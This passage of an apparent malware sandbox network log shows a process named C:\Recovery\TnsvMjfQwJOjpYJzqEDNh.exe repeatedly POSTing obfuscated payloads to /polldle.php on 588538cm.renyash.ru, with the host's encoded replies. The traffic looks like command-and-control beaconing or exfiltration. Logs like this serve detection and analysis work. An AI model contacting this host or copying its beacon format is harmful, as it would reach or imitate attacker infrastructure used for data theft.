                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=emKvOrxumgByNtYScuGrqRwszaAVddqngi%2FPQqgmoJgVqhKrjheXTGgfrPjsn6WZdAprzyrBd8jxezyVS%2FBqeF3yrWeL9FTP8ImsYbks%2BznhYgIhMUc9HxoXJrY28dtt26TPvVRH"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eceb9894340-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8479&min_rtt=1741&rtt_var=14129&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2819&delivery_rate=26237&cwnd=216&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                65 | 192.168.2.4 | 50064 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:46.441922903 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:46.786094904 CET | 2504 | OUT | Data Raw: 5d 5e 54 50 5f 42 5a 5d 54 5d 55 5a 50 5f 59 5e 50 50 5a 5e 57 5c 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]^TP_BZ]T]UZP_Y^PPZ^W\PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU 9#1&$[&2)0/1 -;4</01R,'<]52#*%#X'/\/(
                                                                                Jan 11, 2025 23:33:46.904376030 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:47.080843925 CET | 805 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cgunCBlXjj%2FzD%2BtazG1Ec66Mru3Qqz961iGIYrPSFNz8YRzJJcaZN%2FSqXqDo3yEJ6Vd4C8mhnaKq8nUg9AebUV4MqgAtG5EwNssrx8Fkv3zRdmdz3GMBgZdCMewW2uyanXO9MrYq"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ed3ed1d42d0-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8140&min_rtt=1742&rtt_var=13449&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=27584&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                66 | 192.168.2.4 | 50069 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:47.211997986 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:47.567406893 CET | 2504 | OUT | Data Raw: 5d 5b 54 57 5a 49 5f 5b 54 5d 55 5a 50 55 59 58 50 52 5a 58 57 52 50 5c 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ][TWZI_[T]UZPUYXPRZXWRP\[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#- 128&=]'9T#,1,]$?'T$#6S.$'52+<#X'/\/
                                                                                Jan 11, 2025 23:33:47.678834915 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:47.898166895 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:47.916119099 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:47 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Siry10fm5vaG9MpwbKh72MW0tg1U3NNxwo8JEb4TYaWuQuliXYgZ9k7nYUpRSPttTF1hw%2FZsggiWOoO4kLB4LepsCvuoVI2M3GhwH75UDYa1poUgyc6IFSNytraIAT9ztL4NJpor"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ed8b9d2c448-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2857&min_rtt=1453&rtt_var=3354&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=115060&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                67 | 192.168.2.4 | 50072 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:48.434010029 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:48.786113024 CET | 2504 | OUT | Data Raw: 58 58 54 55 5a 47 5f 5c 54 5d 55 5a 50 5d 59 50 50 51 5a 5d 57 51 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XXTUZG_\T]UZP]YPPQZ]WQP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@-!28&"9'T4!,+?1 6.7$\#2$(5#X'/\/
                                                                                Jan 11, 2025 23:33:48.877964020 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:49.124397993 CET | 807 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:49 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fDERql6EmR994RCKSLx2aTzr5gVK%2F9z74G3mhSzRayzuy935Mc0spxnM5r0F9MscHdiYAf2cQi6mvmDqmBxC6y5qJoGgZ5WE0cXtDJ%2FNr93rt6W2O738yeSvsvNOu85yJXFh0d%2B%2B"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ee03b85439c-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1989&min_rtt=1782&rtt_var=1083&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=424048&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                68 | 192.168.2.4 | 50076 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:49.286494017 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2500
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                69 | 192.168.2.4 | 50077 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:49.620321035 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 1620
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:49.973669052 CET | 1620 | OUT | Data Raw: 58 5b 51 54 5a 43 5a 5c 54 5d 55 5a 50 58 59 5d 50 51 5a 5f 57 54 50 59 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X[QTZCZ\T]UZPXY]PQZ_WTPY[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#B,0&C2/&1\3?9R#<9Z,7^(/3&U5-$("T<(#X'/\/4
                                                                                Jan 11, 2025 23:33:50.073339939 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:50.233906984 CET | 948 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EhYwNMaGmP33gCIcaOqJ6bos72qrR%2BXHm497VeycGgDriy8A%2FaU3YRXRng6J2GKRZGG9vwrQydIV2kqyujC9GtDgMn6x33hQJSPvPFF2OLa%2FKgqbSJbncoMSSBPhe2Aa86W8gW4l"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ee7bd03ef9d-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4755&min_rtt=1891&rtt_var=6438&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1939&delivery_rate=58851&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 39 38 0d 0a 0e 11 2d 0b 27 27 20 5d 3e 00 28 06 3a 38 2c 04 39 31 02 1d 29 08 32 16 34 5f 24 5c 26 54 24 1a 3c 39 22 1b 28 03 27 54 22 2e 2a 1c 26 39 23 46 0c 1d 22 12 3f 2f 0a 1a 25 12 30 12 3f 0d 3e 10 25 1c 3b 1a 2a 37 2c 09 3f 3a 32 05 22 5a 26 51 3f 0b 2a 0f 3d 26 2a 5a 2c 08 3f 5d 25 2a 2e 51 0f 16 21 55 35 31 2c 1b 34 13 19 5f 26 0e 2c 02 2b 27 3b 01 25 04 09 0f 3f 30 26 5a 28 32 05 0c 24 03 27 12 27 3c 25 03 3c 5f 3f 15 3f 3b 24 5c 23 0f 28 56 05 3f 5b 4d 0d 0a
                                                                                Data Ascii: 98-'' ]>(:8,91)24_$\&T$<9"('T".*&9#F"?/%0?>%;*7,?:2"Z&Q?*=&*Z,?]%*.Q!U51,4_&,+';%?0&Z(2$''<%<_??;$\#(V?[M
                                                                                Jan 11, 2025 23:33:50.322302103 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                70 | 192.168.2.4 | 50078 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:49.748934031 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:50.098912954 CET | 2504 | OUT | Data Raw: 58 5a 54 53 5a 46 5a 5f 54 5d 55 5a 50 5a 59 50 50 51 5a 5e 57 57 50 5d 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: XZTSZFZ_T]UZPZYPPQZ^WWP][\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#G,06@&Z1*'9V"?%/]#Z?<3S& *U-' _523Z+#X'/\/<
                                                                                Jan 11, 2025 23:33:50.192986965 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:50.456264019 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:50 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfuaJVv6zcbiSToY84EETZ8voA5bJIeficUDpIxBUJjvQu2AD5nLKVtA%2BIYcopoHRC%2FS%2B%2F7JsvUKZkg4VE2c%2BraMevLMSLk30FNCwPMV6HwgrtmuWiIrdJmjOxFrEiXag%2BIUMWHZ"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ee878b1432b-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3096&min_rtt=1743&rtt_var=3360&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=116149&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a
                                                                                Data Ascii: 4<YW[
                                                                                Jan 11, 2025 23:33:50.546978951 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                71 | 192.168.2.4 | 50079 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:50.682909012 CET | 295 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Jan 11, 2025 23:33:51.036226034 CET | 2504 | OUT | Data Raw: 58 5f 54 5e 5f 44 5f 5c 54 5d 55 5a 50 54 59 58 50 56 5a 5a 57 50 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X_T^_D_\T]UZPTYXPVZZWPPZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#. 5%(?$!%X%/-4/(?1),4!,(5#X'/\/
                                                                                Jan 11, 2025 23:33:51.126868010 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:51.410923958 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:51 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AzxmocjZYyb0BEZgEEH4Za9%2FBBLB2AutO3qfzBn2ZpQRJs72Rs20ODy%2BdeYWLRSUgNid7tfHUqjgqm5TmECGGroFgeNKIb6ptOAaEaOIlYPEcgLjIPf7gTb3mfwzQFYVQ0JBItmm"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085eee4e4043b6-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1937&min_rtt=1757&rtt_var=1019&sent=4&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2799&delivery_rate=456392&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                72 | 192.168.2.4 | 50080 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:51.546957016 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:51.895509005 CET | 2504 | OUT | Data Raw: 58 5c 51 52 5a 48 5a 50 54 5d 55 5a 50 5a 59 59 50 51 5a 5b 57 57 50 5b 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: X\QRZHZPT]UZPZYYPQZ[WWP[[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU#@:5&^0Z$1:0,1#?)8'<$3.48"'](#X'/\/<
                                                                                Jan 11, 2025 23:33:52.011527061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:52.249825954 CET | 814 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:52 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pNyvwjQyM%2Bp99r%2BE92d3fn240muFpjJTojNJq8AB9mQPyZy3pguvNnxqsng9yu%2BvoRgHAUd4g866wDc3mou%2FsL%2BEX%2B%2FLJ6hemoETdIXkLPNqzz18gYrLxU7LCM3Bh7qj%2FvYugHbG"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ef3ca7e42d4-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4743&min_rtt=1683&rtt_var=6751&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=55803&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                73 | 192.168.2.4 | 50081 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:52.390055895 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:52.739322901 CET | 2504 | OUT | Data Raw: 5d 59 51 54 5a 45 5a 5b 54 5d 55 5a 50 54 59 5e 50 5d 5a 58 57 5d 50 5a 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
                                                                                Data Ascii: ]YQTZEZ[T]UZPTY^P]ZXW]PZ[\B\^W^VB[^ES_TT[[QT^[\CZQX\FZZV^YW^URTP^WZDTEUQC[[^_]YPVS_[TDT_RVYZ][TWY[[U_W_]^]A^]UYSPF_\XW[QSU\]STZUZPUP[^\YBZPPU[[[Y^Q_UR]A\[]PVCWWF_]\Z_^\X\QZUYRQYT__]YXU .0:1(2)X0-T7?),?_+<<%V:85+]+%#X'/\/
                                                                                Jan 11, 2025 23:33:52.846191883 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                Jan 11, 2025 23:33:53.093205929 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                Date: Sat, 11 Jan 2025 22:33:53 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5rsi0u8HmIwqmB0XaHzrEI3BA%2FQQ6lMSchIAUzJD6%2F0mXCQBeuZwGvd9OsRGRvOf4DCJyOoigNIaZywqDidDpoV%2Ff5Cr6IADJwaheJbWZ0uG9gVuGlC7VrrzECqPh9KRTv5RoYCn"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 90085ef909570c7a-EWR
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3624&min_rtt=1664&rtt_var=4544&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2823&delivery_rate=84164&cwnd=199&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                Data Raw: 34 0d 0a 3c 59 57 5b 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: 4<YW[0


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                74 | 192.168.2.4 | 50082 | 104.21.38.84 | 80 | 8604 | C:\Recovery\TnsvMjfQwJOjpYJzqEDNh.exe
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                Jan 11, 2025 23:33:53.224828005 CET | 319 | OUT | POST /polldle.php HTTP/1.1
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                                                Host: 588538cm.renyash.ru
                                                                                Content-Length: 2504
                                                                                Expect: 100-continue
                                                                                Connection: Keep-Alive
                                                                                Jan 11, 2025 23:33:53.583025932 CET | 2504 | OUT | Data Raw: 5d 5e 51 54 5a 49 5a 5c 54 5d 55 5a 50 55 59 5b 50 56 5a 52 57 51 50 5e 5b 5c 42 5c 5e 57 5e 56 42 5b 5e 45 53 5f 54 54 5b 5b 51 54 5e 5b 5c 43 5a 51 58 5c 46 5a 5a 56 5e 59 57 5e 55 52 54 50 5e 57 5a 44 54 45 55 51 43 5b 5b 5e 5f 5d 59 50 56 53
